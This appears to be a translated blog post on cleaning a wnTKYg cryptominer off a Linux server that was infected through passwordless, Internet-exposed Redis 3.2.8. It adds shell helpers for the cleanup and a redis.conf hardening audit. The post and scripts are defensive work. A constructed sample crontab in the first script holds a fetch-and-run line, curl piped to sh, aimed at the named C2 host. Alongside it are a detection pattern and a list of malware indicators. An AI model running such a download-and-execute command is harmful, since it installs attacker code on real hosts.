High CPU usage program wnTKYg

On the server, the Linux top command shows wnTKYg using 700% CPU (top sums a process's CPU over cores, so that is seven cores' worth):

 

wnTKYg is a cryptocurrency miner of the same kind as minerd and AnXqV.

Today a server running Redis 3.2.8 (port 6379) was found to be mining. This time the CPU of the affected servers was not driven up to 98% as before but held steady at about 70%. Another server in the same IP segment, also running Redis 3.2.8 (on port 6000), is not being mined so far and is being kept under watch.

The temporary workaround is the same as in the earlier incidents:

1. Block traffic to and from the mining server: iptables -I INPUT -s www.bdyutiudwj.com -j DROP; iptables -A OUTPUT -d www.bdyutiudwj.com -j DROP (iptables resolves the hostname once, when the rule is inserted, so only the addresses returned at that moment are blocked; re-check if the host changes IP)

2. Find the wnTKYg binary: find / -name wnTKYg (if the file has already been removed from disk, /proc/<pid>/exe of the running process still points at it)

3. Remove the execute bit so a cron job cannot restart it: chmod -x wnTKYg

4. Kill the process: pkill wnTKYg (pkill treats the name as a pattern; pkill -x wnTKYg matches the name exactly)

5. Clear scheduled tasks: delete the files under /var/spool/cron (review them first so legitimate jobs are not lost, and also check /etc/crontab and /etc/cron.d)

6. Clear files: besides the two abnormal files under /opt, the following under /tmp also need to be removed: Aegis-<Guid(5A2C30A2-A87D-490A-9281-6765EDAD7CBA)>, AnXqV, ddg.217, ddg.218, ddg.219, duckduckgo.12.log, duckduckgo.17.log, duckduckgo.18.log, duckduckgo.19.log
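The steps above as a set of offline-checkable shell helpers. This is an added example, not code from the original post: the process names, the C2 hostname and the /tmp indicators come from the post, while the function names, the %CPU threshold and all sample data (the ps listing, the crontab, the RFC 5737 addresses, the i.sh URL path) are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original post. Helpers for the cleanup steps
# above; everything that is not a name taken from the post is an assumption.

C2_HOST="www.bdyutiudwj.com"
MINER_NAMES="wnTKYg minerd AnXqV"

# Constructed sample of `ps -eo pid,pcpu,comm` output on a 7-core host.
SAMPLE_PS='  PID %CPU COMMAND
    1   0.0 systemd
 2311 698.5 wnTKYg
 2400   1.2 redis-server'

# Constructed sample crontab: one legitimate job, two planted ones.
SAMPLE_CRON='# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://www.bdyutiudwj.com/i.sh | sh
* * * * * /tmp/AnXqV'

# Steps 2 and 4: from ps output on stdin, print "pid command" for every process
# at or above the given %CPU. ps/top sum a process's CPU over cores, so 700%
# on a 7-core box means the process owns the whole machine.
high_cpu_procs() {
    awk -v t="${1:-300}" 'NR > 1 && $2 + 0 >= t { print $1, $3 }'
}

# Step 2, live use: resolve each running miner to its real binary via /proc.
# This still works when the file was renamed or deleted after it started
# (readlink then prints "... (deleted)"), which `find / -name` would miss.
miner_exe_paths() {
    for name in $MINER_NAMES; do
        for pid in $(pgrep -x "$name" 2>/dev/null); do
            printf '%s %s %s\n' "$pid" "$name" "$(readlink "/proc/$pid/exe")"
        done
    done
}

# Step 5, done selectively: print only crontab lines that reference the C2
# host, run something out of /tmp, or pipe a download straight into a shell,
# instead of wiping /var/spool/cron and losing legitimate jobs with it.
suspicious_cron_lines() {
    grep -E -v '^[[:space:]]*(#|$)' \
    | grep -E -e "$C2_HOST" -e '/tmp/' -e '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh'
}

# Step 1: `iptables -s <hostname>` resolves the name once, at insert time, so a
# C2 host that moves to a new address is no longer blocked. Resolve explicitly
# and emit one rule per address. Rules are printed, not executed: review them,
# then run as root.
resolve_ips() {
    getent ahostsv4 "$1" | awk '{ print $1 }' | sort -u
}
block_rules() {
    host="$1"; shift
    for ip in "$@"; do
        printf 'iptables -I INPUT  -s %s -m comment --comment "%s" -j DROP\n' "$ip" "$host"
        printf 'iptables -I OUTPUT -d %s -m comment --comment "%s" -j DROP\n' "$ip" "$host"
    done
}

# Demo on the constructed data only; nothing is killed or changed.
echo "== processes over 300% CPU"
printf '%s\n' "$SAMPLE_PS" | high_cpu_procs 300
echo "== suspicious crontab lines"
printf '%s\n' "$SAMPLE_CRON" | suspicious_cron_lines
echo "== firewall rules for two constructed (RFC 5737) addresses"
block_rules "$C2_HOST" 192.0.2.10 198.51.100.7
```

On a live host, replace the sample data with `ps -eo pid,pcpu,comm | high_cpu_procs 300`, `cat /var/spool/cron/* /etc/crontab /etc/cron.d/* | suspicious_cron_lines`, and `block_rules "$C2_HOST" $(resolve_ips "$C2_HOST") | sh`.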

Note: the root cause is the Redis unauthenticated-access problem: Redis was listening on 0.0.0.0:6379 with no password and reachable from the external network, which lets anyone who can reach the port write files onto the host, and that is how the Trojan programs were planted. Until the instance is bound to localhost or firewalled and given a password, the cleanup above is only temporary and the host will be reinfected.
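The exposed setting beside the hardened one, with a small audit function, as an added example that is not part of the original post. bind, protected-mode, requirepass and rename-command are real Redis 3.2 directives; the two sample config files, the placeholder password and the function name are constructed for this example.

```shell
#!/bin/sh
# Added example, not code from the original post: audit a redis.conf for the
# exposure the note describes (Redis on 0.0.0.0:6379, no password, reachable
# from the Internet). Sample configs and the function are constructed.

# Print one line per weakness found in the given redis.conf.
# Exit status 1 if anything was found, 0 if the file looks hardened.
redis_conf_issues() {
    eff=$(grep -E -v '^[[:space:]]*(#|$)' "$1")   # effective directives only
    bad=0
    bind=$(printf '%s\n' "$eff" | awk '$1 == "bind" { $1 = ""; print }')
    case "$bind" in
        "")        echo "bind: unset, Redis listens on every interface"; bad=1 ;;
        *0.0.0.0*) echo "bind:$bind exposes the port on every interface"; bad=1 ;;
    esac
    printf '%s\n' "$eff" | grep -q -E '^[[:space:]]*protected-mode[[:space:]]+yes' \
        || { echo "protected-mode: not yes"; bad=1; }
    printf '%s\n' "$eff" | grep -q -E '^[[:space:]]*requirepass[[:space:]]+[^[:space:]]' \
        || { echo "requirepass: unset, anyone reaching the port has full access"; bad=1; }
    printf '%s\n' "$eff" | grep -q -E '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' \
        || { echo "CONFIG not disabled: a client can change dir/dbfilename and make SAVE write a file of its choosing"; bad=1; }
    return $bad
}

WEAK_CONF=$(mktemp); HARD_CONF=$(mktemp)
trap 'rm -f "$WEAK_CONF" "$HARD_CONF"' EXIT

# Constructed sample: the exposed setup behind this incident.
cat > "$WEAK_CONF" <<'EOF'
bind 0.0.0.0
port 6379
protected-mode no
daemonize yes
EOF

# Constructed sample: hardened. Bind to loopback (or the internal interface
# only), keep protected mode, require a long random password, and disable
# CONFIG so the write-a-file trick is gone even if a client does get in.
cat > "$HARD_CONF" <<'EOF'
bind 127.0.0.1
port 6379
protected-mode yes
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
daemonize yes
EOF

echo "== weak config";     redis_conf_issues "$WEAK_CONF" || echo "=> exposed"
echo "== hardened config"; redis_conf_issues "$HARD_CONF" && echo "=> ok"
```

Run it against the real file with `redis_conf_issues /etc/redis/redis.conf`; a non-zero exit means the instance still has at least one of the weaknesses that let this incident happen. Binding to 127.0.0.1 is the single change that closes the external path; the password and the disabled CONFIG command are defence in depth for the day the bind line is relaxed again.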

 

Original address: http://blog.csdn.net/my8611051316/article/details/60571779
